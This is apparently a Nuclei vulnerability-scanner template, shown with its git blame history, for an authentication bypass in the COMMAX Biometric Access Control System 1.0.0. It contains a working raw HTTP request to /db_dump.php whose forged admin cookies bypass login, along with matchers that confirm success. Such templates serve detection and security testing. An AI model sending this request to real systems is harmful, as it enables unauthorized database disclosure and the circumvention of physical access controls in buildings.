nuclei-templates/vulnerabilities/other/commax-biometric-auth-bypas...

id: commax-biometric-auth-bypass

info:
  name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
  author: gy741
  severity: critical
  description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
  reference:
    - https://www.exploit-db.com/exploits/50206
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
  tags: commax,auth-bypass

requests:
  - raw:
      - |
        GET /db_dump.php HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: {{BaseURL}}/user_add.php
        Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<title>::: COMMAX :::</title>"

      - type: word
        part: header
        words:
          - "text/html"
Update and rename commax-biometric-access-control-system-auth-bypass.yaml to commax-biometric-auth-bypass.yaml 2021-08-24 11:47:43 +00:00			`id: commax-biometric-auth-bypass`
Create commax-biometric-access-control-system-auth-bypass.yaml The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-08-22 09:19:34 +00:00
			`info:`
			`name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass`
			`author: gy741`
			`severity: critical`
			`description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.`
Update commax-biometric-access-control-system-auth-bypass.yaml 2021-08-24 11:43:17 +00:00			`reference:`
Update and rename commax-biometric-access-control-system-auth-bypass.yaml to commax-biometric-auth-bypass.yaml 2021-08-24 11:47:43 +00:00			`- https://www.exploit-db.com/exploits/50206`
Create commax-biometric-access-control-system-auth-bypass.yaml The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-08-22 09:19:34 +00:00			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php`
			`tags: commax,auth-bypass`

			`requests:`
			`- raw:`
			`- \|`
			`GET /db_dump.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9`
			`Referer: {{BaseURL}}/user_add.php`
			`Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`words:`
			`- "<title>::: COMMAX :::</title>"`

			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`